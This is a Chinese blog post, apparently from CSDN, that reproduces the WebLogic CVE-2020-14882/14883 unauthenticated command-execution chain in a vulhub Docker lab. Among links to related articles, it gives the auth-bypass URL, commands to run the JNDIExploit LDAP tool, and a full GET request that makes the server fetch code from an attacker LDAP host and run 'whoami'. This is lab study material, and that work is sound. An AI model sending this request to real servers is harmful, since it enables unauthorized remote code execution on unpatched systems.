Weblogic 管理控制台未授权远程命令执行

最新推荐文章于 2024-05-14 10:45:34 发布
最新推荐文章于 2024-05-14 10:45:34 发布
阅读量545 收藏
点赞数
分类专栏: 渗透测试自学日志之漏洞复现篇 文章标签: 安全 web安全 服务器
原文链接:https://blog.csdn.net/qq_41901122/article/details/113791238
版权

漏洞描述

Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。

CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。

影响范围

  • WebLogic Server 10.3.6.0.0
  • WebLogic Server 12.1.3.0.0
  • WebLogic Server12.2.1.3.0
  • WebLogic Server 12.2.1.4.0
  • WebLogic Server 14.1.1.0.0

实验环境搭建

在Ubuntu上安装了docker,并将vulhub master下载到虚拟机中,执行以下命令启动Weblogic 12.2.1.3版本的服务器

cd /Desktop/vulhub-master/weblogic/CVE-2020-14882
docker-compose up -d

启动完成后,访问http://your-ip:7001/console即可查看到后台登录页面。
在这里插入图片描述

漏洞复现

首先测试权限绕过漏洞(CVE-2020-14882),访问以下URL,即可未授权访问到管理后台页面:

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal

在这里插入图片描述

启动LDAP

curl https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11
unzip JNDIExploit.v1.11.zip
java -jar JNDIExploit.v1.11.jar -i ip(是可访问到的VPSip)

在这里插入图片描述

配合WebLogic未授权漏洞,远程进行代码执行

GET /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.189;128:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Host: 192.168.189.134:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
cmd: whoami
Cookie: ADMINCONSOLESESSION=gfVHIwtwCTKpzZ3td7NhndHlmqCXVJw04t0sux8OZmgy7RQdNbSN!-627419742;
Connection: close

此处注意VPS的ip加了分号(这里是不是绕过?)
在这里插入图片描述
成功执行命令,之前试了很多次都没成功

maverickpig
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Weblogic授权访问以及LADP远程代码执行(CVE-2021-2109)
hackzkaq的博客
05-14 1487
1.影响版本: WebLogic Server10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0 实验环境: 攻击机:kalilinux 10.1.1.10 靶机: 10.1.1.109 2.weblogic授权访问: 对目标地址的7001端口直接访问 构造绕过授权url: ip:7001/console/css/%252e%252e%252f/consolejndi.portal 其中%252e%25
Weblogic CVE-2020-14882 授权远程命令执行漏洞
读书 买花 长大
02-25 606
CVE-2020-14882
Weblogic 管理控制台授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)
最新发布
weixin_45653478的博客
05-14 928
Weblogic Pre-Auth Remote Command Execution 漏洞(CVE-2020-14882, CVE-2020-14883)是针对 Oracle WebLogic Server 的两个安全漏洞。CVE-2020-14882 允许远程用户绕过管理控制台组件中的身份验证,而 CVE-2020-14883 则允许经过身份验证的用户在管理控制台组件上执行任意命令
weblogic管理控制台授权远程命令执行漏洞和weblogic SSRF漏洞复现
weixin_48739941的博客
04-21 1525
1 weblogic管理控制台授权远程命令执行漏洞复现 (1)cd CVE-2020-14882 切换目录。 (2)docker-compose up -d 启动。 (3)访问http://192.168.241.128:7001/console (4)http://192.168.241.128:7001/css/%252e%252e%252fconsole.portal绕过漏洞,授权访问后台管理页面。 (5)burpsuite抓包。 (6)send to repe..
weblogic后台启动
weixin_34362790的博客
12-15 342
最近发现一个问题正常情况下,使用telnet或SSH登陆linux后,使用./startWeblogic.sh在用户推出登陆后,weblogic也会停掉,这是因为wls进程依赖于telnet进程,解决方法有二:1:切换到csh,键入命令 nohup ./startWeblogic.sh &2: 切换到csh, ./startWeblogic.sh 启动后ctrl+z,...
weblogic server - 控制台访问
vanghoh
11-27 279
访问 10.3.0 console 再访问 10.3.5 console console 主页显示不正常 办法:清空浏览器历史数据
Weblogic控制台和应用端口分离
07-10
一般情况下,我们要求部署的服务端口和程序的服务端口分开来控制
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它允许攻击者通过发送恶意构造的序列化对象来执行任意代码,从而获得对服务器的完全控制。这个漏洞存在于WebLogic ...
weblogic忘记管理员密码.doc
07-03
在Linux系统下,WebLogic控制台密码重置的步骤与Windows系统类似,需要停止WebLogic服务进程,备份相关文件,执行密码修改命令,最后启动管理控制台。但需要注意的是,在Linux系统下,需要使用适合的Java环境,以免...
weblogic控制台密码重置和修改
08-04
weblogic控制台账号和密码忘记了怎么办,可以重置吗? 答案是肯定的。 自己做了一个bat文件,先压缩包里的说明文件,然后就可以一键操作完成账号和密码都置成weblogic/weblogic,自己在本机测试通过的,希望对大家...
weblogic控制台创建jdbc数据源
12-27
WebLogic Server是一款由Oracle公司提供的企业级应用服务器,它提供了丰富的功能来管理和部署Java应用程序,包括JDBC(Java Database Connectivity)数据源的配置。在WebLogic控制台上创建JDBC数据源是连接数据库的...
JNDIExploit.zip
12-14
JNDIExploit
Weblogic后台部署War包
m0_65150886的博客
10-19 769
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
【vulhub】Weblogic后台部署War包Getshell
qq_45300786的博客
04-13 2722
一、什么是WebLogic WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 二、漏洞描述 本环境模拟了一个真实的weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞。分别通过这两种漏洞,模拟
weblogic控制台定制不同权限的用户
H405282968的博客
01-13 522
  安装weblogic并创建域(domain)的时候,会默认创建一个用户,此用户为管理员,也就是权限最大的。只有这样一个用户,用起来很不安全,因为一个测试环境,好多人在用,经常会有人修改上面的数据源等关键配置。   这时候最好的办法就是利用weblogic自带的安全功能,我们来创建个新的用户,可以理解为访客,只能读,不能写。 为了创建此用户,我们先来了解几个weblogic自...
提示用户此计算机没有授权,怎么解决电脑“授权用户在此计算机上的
weixin_40007541的博客
06-16 5183
Windows XP用户帐户管理与权限设置1:标准用户该用户可修改大部分计算机设制,安装不修改操作系统文件且不需要安装系统服务的应用程序,创建和管理本地用户帐户和组,启动或停止默认情况下不启动 的服务,但不可访问NTFS分区上属于其他用户的私有文件.2:受限用户该用户可操作计算机并保存文档,但不可以安装程序或进行可能对系统文件和设置有潜在的破坏性的任何修改.3:其他用户(1)系统管理员--有对计算...
weblogic修改控制台ip_Weblogic授权访问及命令执行分析复现
weixin_39640085的博客
12-12 1256
一、背景漏洞概述:WebLogic是美国Oracle公司的主要产品之一,是商业市场上主要的 J2EE 应用服务器软件,也是世界上第一个成功商业化的J2EE应用服务器,在 Java 应用服务器中有非常广泛的部署和应用。10月21日,Oracle官方发布数百个组件的高危漏洞公告。其中组合利用CVE-2020-14882/ CVE-2020-14883可使授权的攻击者绕过WebLogic后台登录等限...
【vulhub】Weblogic Console HTTP协议远程代码执行漏洞复现(CVE-2020-14882)漏洞复现
qq_45300786的博客
04-10 390
https://www.cnblogs.com/backlion/p/13951858.html
vulhub漏洞—Weblogic管理控制台授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)
weixin_45808483的博客
12-20 2837
Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。 CVE-2020-14882允许授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以授权的任意用户身份执行命令。 漏洞环境
WebLogic Server管理控制台部署教程(图解)
- **远程部署**:需要预先准备归档文件,通常是JAR、WAR或EAR格式,然后通过WebLogic Server的管理控制台上传到远程服务器进行部署。 在远程部署的过程中,通常需要将打包好的应用文件通过FTP或其他文件传输方式...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值